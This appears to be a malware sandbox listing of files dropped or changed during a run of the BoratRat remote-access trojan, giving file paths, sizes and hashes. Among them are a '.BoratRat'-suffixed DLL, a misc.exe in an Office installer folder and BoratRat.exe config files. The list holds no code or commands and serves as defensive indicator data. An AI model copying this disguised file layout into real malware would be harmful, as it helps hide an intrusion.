SHA512a9641ebb2c7b42f8b67bc4b0963869c2bbb3728c250ea80aabc1a2fc5f9e7244bece98ef137571b71a64fc7432ee92e02d977e2b83a850d3e3466b73664f0bf7
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-file-l1-2-0.dll
Filesize18KB
MD51dec39c5adfda9dfa7e7d98fe2c9bc71
SHA1cc1ca16d36cf5f23c5cd69bb3f4730f05814f602
SHA256a597fad3dc0add34db2503991975b2e734bd8c12080d1af5119b5db7cdacc9a2
SHA51263a57a5e543a041d21b536c543ea0c11aa646141e4423fe055f314e22801cc9e1176b494bcf221dedf3d6e3560d43d15eebde2bab0b551ee5f6c3df48177819e
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-file-l2-1-0.dll
Filesize18KB
MD571013d0511c2af41289992e6ab7e8072
SHA123bc4d5f0e61d402078b064d9d924a50abc9e623
SHA25667e400ba678aaa793b3b139eea186269a6c0ed843bb0162fe56c4daa26169df1
SHA512a4e35527fdeccd140239bce6acb0cba81af580f202ff1da277529188a1470adf5a264244de71e804ad08ef1026f5a666c6f9388f48b7e50cb430b3a5e79c5514
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-localization-l1-2-0.dll
Filesize20KB
MD5afd7c5f4f7869c2e02db6b88a4eba035
SHA19a881d528710b156690726d7a655d57bd760a1fb
SHA256fae11f68f303f2f67a8634ed6904b879304119e81c349f88cf25bdfcd12dbbff
SHA512e89adeefe0d1fb6f9a516f7fed29d9ec35ebe5b1b54c87e88a7e3b49ec757208b7af870db72c1378c684ad4919fb4850e7983ec820dbcf7408d22c78f6187cf0
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-processthreads-l1-1-1.dll
Filesize18KB
MD5cf803b4ec86a2ee10d6eb9dc5bd05a5f
SHA1921d55b52251190032e8c09e165dbf5901f4f03b
SHA256649efb6f8cf0083ba5ef60ac4fbda80b9ea68fd8d6ac95382d6a2c46b890b888
SHA5126e61e31f4321b659d64e1b061d7efe097d99b968958b07b2c40662302e27e99d29a94b951c9627af4af98f8b423bd139ec78e8c93184a3eb19e5134e0d02eb8a
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-synch-l1-2-0.dll
Filesize18KB
MD5a8a44848a3ed939a510baf520db56133
SHA15cc33a46975e86b96f5c84dd520980806acb52a5
SHA2564865b14c297ac5ffee739bac2c438576a4436309ae167a3c4a862609d648e266
SHA5125ac9ad9db80a560e84355e67d683af8569ed5017cbe157e340b2888332e33dc90820917923be6578f35d2b6e04df11ba95348e2b0c8ba3da3d796ce39e3be1c3
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-timezone-l1-1-0.dll
Filesize18KB
MD5bcad5d9a7024b7fcd2faa1abf783bca3
SHA166e41b3ce0be55db2aaa532c4b74b1ec46b38785
SHA256aef0e5129e8773bb825590337909211f55a02959003fd6a512c32c86db7dc984
SHA5127bde6991fba2cefde4f93d0c5c3ee9ad93bfc3ca891151efe84066d8f146e0938f64c6af5ba5e5506abbded8c7a79f9004d0eaf9dad9683e0b64b7e6046d4fb4
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-xstate-l2-1-0.dll
Filesize11KB
MD589ac8da153e5169d8029c8db7cc95143
SHA133b0053d00fc2be2385f76b8e45452348aa280a7
SHA2563e1a1167687c2689e762996f41f3a0bc41f7aaea9e299f2d3a4839b363c65983
SHA5126cc25b2782f65756ea9a57b686625d8bec25758daa330988395b8d853822e9710783ccd5ddde55d615c7fb02712c8ca8f4b6ef2162f42ead041962fe71c7d05c
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-conio-l1-1-0.dll
Filesize19KB
MD58fdcb400daab836867f6af3e1aec161b
SHA14ad8ccf0dd80c1b6b39a272196bd3bf9c7c30081
SHA256dd94e3a67517388f9a02b919345cbfad20f73b1e6a40d5d9c7fab659c564ff77
SHA5126923c87869f62b8b58de1e59470348b59b911034e6d690f9be69db76f75fc5691b232f179dcc8db46e64c62b6f82f79488c37fcf12a58022e50432e952306b96
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-convert-l1-1-0.dll
Filesize22KB
MD59fb5bf5cb7e83c26d6486ebe1007abd9
SHA1b6857e0defabbebd0c927009a3860bd793010d64
SHA2567e25ee76e2bbcac034eb7a7a63a3df429e458835b592e196f3069111682ff8e6
SHA512ee1f992ebba4bb2980332bbea470d5f47a4813b5aef01035180db87396c877606d54482440f6eece97d77236d4b9acfedad6dc8e39d8ab3ea73f93cc97263478
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-environment-l1-1-0.dll
Filesize18KB
MD5e66ed9b3c8d2fe8009854dce1fb67d14
SHA17577b6bf95315f089a310af6a57e36733a8d4c9b
SHA25643e4d190498781a78814b40834632add3abdbc0a67073c30910e9874246dce33
SHA51236501ea728863e305929e55f276c20533a7536507351ff97eab7c53a5bc6b70f0d8dd06aa0c67d96f1ae7d88d8924e7f1f5cb65e7a7f32a829a52b060768e03c
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-filesystem-l1-1-0.dll
Filesize20KB
MD581ad66c0b4525c166ca474fed1aee74a
SHA1cb6f8a2f4307499d15c6b0421b8143d4d2a811e8
SHA256f27de3672842302c1cda3d268a8ceaac6eee8b1c45cdf5028a4e9d715141710c
SHA51236e9da7296631153c9b4b68e88d63f24575c12516a257be10127bf375d67f534811a02b9e1f7e63ffc1e290f073d508781d5ffcfb559d8981876c863de37a6af
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-heap-l1-1-0.dll.BoratRat
Filesize19KB
MD57c025c27517bdc612ae60c8bb35cb7cc
SHA153815f9e818eedbd7321ed59604e930ea7209b43
SHA25693cc10b88f78efe7d3de10e73aa375d8c3c0d4f320df530f7b544e4fb455a680
SHA51230b5903fb97bf1ec8fff405316ab5715a9ad6b0ff559d37e214abfcf7ed8d298f20cab3406c492d07494c774db0ed63de2dda953d7e0392aa32aaa81d58cceeb
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-locale-l1-1-0.dll
Filesize18KB
MD5fa1f159104ab7793caf8ad9c9de41bdc
SHA16f5d736205001d19c7c7a267531b325164c2c3f9
SHA25689798d09d303775ab9bb867f10956fed3a67c41c3a518c818dd5cfdf5c69c7cf
SHA512c4bec5bc62acbf71d2b0d414f136607625623f731880c91c86dc8ce21586a027c8cba6572c18e7dbc8110a19394ac82a26610e78999640c76665fd94cc2cb172
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-math-l1-1-0.dll
Filesize28KB
MD5ef896825fec3cd1d754787b76ac7c232
SHA1ea7da1f78dbe49b973f63920c4c90022796cdae2
SHA2563a5882860030b83b9934dcbfb40c7245376c7145cb08c0a845b9c06cf9a7e728
SHA512fd2fec0c40dc21fad098afe73d3a36d7031d00f42336a3ce175479da80cff9d3ea42a635005af1135a097566f686e2b6f04238a22fb67fe6914d313bd2e9f957
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-multibyte-l1-1-0.dll
Filesize26KB
MD51d60ed17184cf352b3f065b6b1f1506b
SHA1b4410be372e0a2e48abb46a08f94843f70c5fed2
SHA2564d99e051870df3cc5f1b33c406a8f6b353c44c9bcdd863be2cb39d24b2e88348
SHA5124c9093873e9c67cef67e79b6f6c6b12e9ca5f4ec9f8f2a7a7cc392346bd094164da7d7b3b510840edb249d527164d9e719cb3ae542b1a9db7e28d68c8a0eeb3c
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-private-l1-1-0.dll
Filesize71KB
MD56fffe57d0c3cdbb70e49c75acf9c54f7
SHA11d611e4668fa15b82ab6f740f7ac43787cbb83c4
SHA256e59b80f9d0dfbea0e6df73baae3a0c3d441d3e1edd811fb8bbf0ad66d0dc1e9d
SHA512b6e838c4f8fc658b5db3bb7786bd89da286ed20037503823ffdccab0cfaaf8da73c95dcca32f44dbdbbaad327aea1aad3df952793c12d9ae25a28e34a82487c3
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-process-l1-1-0.dll
Filesize19KB
MD54fc8685d592b8d28c215281021f7ba62
SHA1b26196797d1dacb5a0b154405c5d6e95453d6a77
SHA25660ee60a06e9a061f1a3c9d01bb3bf544923129bbdc32a27a61951dee063f0d0c
SHA5120e2ebd7d36fa3beddde3f333d4d10dd64e1dc4ef962e9c85c3fa1c0673121817c2a5bac14c5207dea2e8c7a478af93f5d8c9dcaf9cab9830dd2f3145d595e29d
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-runtime-l1-1-0.dll
Filesize22KB
MD5dabf29579f799b7da929820e570777dc
SHA18d517556b80a2f1a210bc153466d10b4f4436c0e
SHA256b23a182b109da7b27abb491d1c45de086d6a5dc7403db31454015072f8c0c6ad
SHA512d264be09544f6f259fe3edad79fcb16f2dcfd50f1761135ce8bc37d267b307e5f8ce4ec0a979746774ff361971708e0afca1a733cf5cec7da56660c8219853da
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-stdio-l1-1-0.dll
Filesize24KB
MD5fda8452ec010a350fad2041f07fc03bc
SHA1829849cd704c4917c15704d3c8fc218ce0ff1418
SHA256cc2f1e79bb3e0d3e585a97501a3fdb8af2f04748fdcc6dfd50d46629577ea81e
SHA512f6e603ad7c34c9cb67584655e843a50dab4ea7e99f3938d5e8d6f6b879e7fba4e898bafa8e73c7eaa471e2aa64a59ea7b40f9dad1c9f5dc9e6b90a1bf6ce33c3
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-string-l1-1-0.dll
Filesize24KB
MD5f545d077e959436712c7278dc8871896
SHA17cab58f8b3390e3c401b8866705cbb5155834061
SHA256eb3985f14fded950b03d6993b1c74a9c6de4aacdab25e1250a1c5f61b7f3869b
SHA5126319af1a147323dccbe3694e77b2e84faf5cca19bc205c418fc1b0d32386cf60769f24005dcb1949a59c1c5e41aca5e63e6990312385990e8dec1b4ac688c171
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-time-l1-1-0.dll
Filesize20KB
MD5ce8ae2941d6e4236664bf3b72fdab5c0
SHA1694e07ba17e16fe621cac884e85e4afc05450365
SHA256c7c302b541ee4bf0c0807abd762b829a7ec428d1df6051d25dce8f245463bac1
SHA512ec8d9ea5c05b39b490c21a42baf9e229da4d183565fcca9f9726b3219cad6183582f6331d97270b92bdc32b5c598e01fa90585dce34600fa4b3ec61b2686a5a9
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-utility-l1-1-0.dll
Filesize18KB
MD593983e003d6030b5ac79c9da5c340206
SHA18978adb85adf7aa851aca8ea287be581403b0162
SHA256cb3387e8dd057c247f55a51e34d5ffd7347e3cf7963c669dc3142c2fecf8eb22
SHA51299cc8c961ea325462f45b7304ff9ffb160cb724924c3c2805c9fcf44ba0b15c4d56ecf6726cb495a427c0fdbbe360456fa7e77e3c477497b4a14b3b2f000fe4f
-
Filesize
244KB
MD57d1c503f28512aefb380e837c61b1d3e
SHA148e0d9b3e76944d4247337db87d81301f70bf143
SHA2564b5f5e1ac329519e08e0f3a9b154970592278228573510d85c853ce9d482c489
SHA5124e94023b0519ba646a6fc4558508426f99d518ba98cec600421ab4e500f4d4ff4e361822c669530187d485a14f9352dd70799a470362ccba802d734c9b719960
-
Filesize
4.8MB
MD5c366e114f9e2bf94395b38ed744f1d67
SHA1b8575db3ec016cc0264475daabf6c461146a789d
SHA256581ec3d61632ddc53031f75dae2f59796800f2956deee12ff0e28a8f656d745b
SHA512cdd5aea271331e549ee5c524b116897a89f0815ec055f2ba1478e1dca07af4855e8fc0955bfe6db98adf6e1d553d1bfcae0803893fa600c77dc99a49f1473f83
-
Filesize
444KB
MD51b527f78edb44dda4ae42bdcaa2cec1e
SHA1339afe868f375420fa3611db8614db0acb603111
SHA256be93b467e655ef7740913fbd049c48aab7454ba1c04f22d670fec764d658a0e0
SHA5120d9777b9ac3a068322a563c1cdcf40ee71480446963d3b19d91fec5164094d5841b7fbb7eae056bf94ead78448ad108fa23d02ca82671d180ca1199756ab0ed2
-
Filesize
439KB
MD581a05cad5e1b32490ce9433e272900d0
SHA1b32617cf6c32f76d777a2d83766a28b42a34cfd7
SHA256a0e6c6eeee5a8928a8ac6876028b4028f45ea001eb7907d2cdac2dffe5d6e29e
SHA512cf05ae02f255573a6ec5b78c0097073c082c0bf9c6932b62209f59e139e228b1c69ed32b759bdbdca8445849b1e63166426d36c2265a69517b6fbcbc9927ff52
-
Filesize
946KB
MD50079aa35213c0e144162270c78d5a391
SHA15c1662659f63b3553f6def3f315f03ae97f6627b
SHA256a5b80b477424a64a02340083b559176115529e85aa3f53a6324e75abca8e20ba
SHA512189e672ae3a2ba11e23064170715a67d4c50e64fb25ee600b8ec212413b9aa98c26df3085623aaa7d5b91e38ec197171a75bb367628cd22e97830893f61090e2
-
Filesize
879KB
MD5636d90f6a500a395ca650ffbea536770
SHA18fd8b7a27b4a84df35cb6c71f294791d8c136c35
SHA25639b75091720ff7e9eb4bb845074bcffa5295a55e2f2c9827a15c24e79b44fe05
SHA512c04d0e3af947598ed5c4a6c3788febb37d2b256ef3f0117664111db3f6952eac80949355ca1fd78c794b7e594d04b3a7541b3c323c45b71b21b316068aacbafe
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\vccorlib140.dll
Filesize263KB
MD5655eb892a215f8302a67fabf9188f0fc
SHA1a81c6987e33c7ed1699bc5ac2386e6d12b2b7f92
SHA256c615adbf8b794d479bcb7a342bac62ccd3a52bb82376cce550a1883414c6e949
SHA5128f48134de52571d68b775ca0be770cb44981ed0fe2eb4f6420d193edfa54babafcc57ac31ac93c207ef9073703165409fda32c9c5fcbff1d4df7278b99842090
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\vcruntime140.dll
Filesize79KB
MD5fa6c0bce57f12e412f4b05bc378cfa8d
SHA17b3fd7a72555e69b6750da67ccfde5b1b7a1616f
SHA2562af06f6ad2591e3610637842ce8f98f78a027682ea7b30242ed8e362fac6f714
SHA5122a5b11676aa693d40971508225161020e6e90cb661af2c291801c9d9c228635db085385f8a6be73400581abf006072185f6dca00a6111e19873e3279f4c1b969
-
C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-1000-0000000FF1CE}\misc.exe
Filesize1014KB
MD539bdfba28edb9e4b6d576bb67e99bb8d
SHA14347f39fc1e7d4a7059c387b5cd80e23db3d7635
SHA256e524c3572fd9f72c7cb76d479b6aee9fd73afa9cf353f112e1a224c6be09cc87
SHA512b339a6ecba8a377a6ba41a53ec229caad196bbdede739dedbe98874a7d22da9cd479082225c85bc9897a6271cb9a9b935b79e594fdfa818ace61140488141af8
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_0
Filesize 8KB
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_1
Filesize 264KB
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_2
Filesize 8KB
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_3
Filesize 8KB
-
C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat
Filesize 8KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\0991MIZCPJ_50
Filesize 128KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\0AGOS2C7IK_19
Filesize 880B
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\0IHE3OVZM3_43
Filesize 10KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\0L9KTMHKPK_71
Filesize 456KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\169P9AUAH5_57
Filesize 62KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\1DH2WTAJAG_20
Filesize 271KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\1YUAUGJ4EB_29
Filesize 36KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\3FY1YJKDGA_60
Filesize 2KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\4561C2MF3S_21
Filesize 1KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\4RH6J0Y5GX_64
Filesize 43KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\569T4H8YLF_58
Filesize 960B
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\5PM6ULXH3Y_72
Filesize 165KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\641CU7BN97_74
Filesize 2KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\6KQQAUKDEX_35
Filesize 96KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\6SQTY03HKY_82
Filesize 1.9MB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\73DSD5R51P_36
Filesize 17KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\76DZCHCILL_23
Filesize 120KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\AH3EESUM2R_40
Filesize 11KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\AQQH41CUR5_22
Filesize 127KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\CYVIPXLISZ_68
Filesize 496B
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\D9CYK0WE3M_25
Filesize 1KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\DGCD1U241E_11
Filesize 123KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\DQ518A0D1V_61
Filesize 44KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\EEDKR24BYJ_16
Filesize 20KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\F0YUJBZ0WA_44
Filesize 73KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\GKOL1G8OER_18
Filesize 8KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\JAU7ICDTJN_49
Filesize 1KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\JGFH8Q2XRI_51
Filesize 15KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\JN6Z5HCX2U_83
Filesize 360KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\JSYMTVSF9I_77
Filesize 16B
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\KZAZAG2SF8_30
Filesize 128B
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\NRWHTGV6H5_26
Filesize 1KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\P37BVKJFKB_27
Filesize 2KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\PRXGEA1WGI_10
Filesize 14KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\Q3QXXREDJL_53
Filesize 102KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\TGAP7LYUU2_85
Filesize 1KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{4f0e67c9-da3b-4330-9bd0-cbaa1891c14f}\0.1.filtertrie.intermediate.txt
Filesize 16B
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{4f0e67c9-da3b-4330-9bd0-cbaa1891c14f}\0.2.filtertrie.intermediate.txt
Filesize 16B
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize: 2KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize: 3KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SettingsCache.txt
Filesize: 846KB
-
C:\Users\Admin\AppData\Local\Server\BoratRat.exe_Url_lrgptkwgygy0ckkeksopg3divcheuvku\1.0.7.0\user.config
Filesize: 309B
-
C:\Users\Admin\AppData\Local\Server\BoratRat.exe_Url_lrgptkwgygy0ckkeksopg3divcheuvku\1.0.7.0\user.config
Filesize: 580B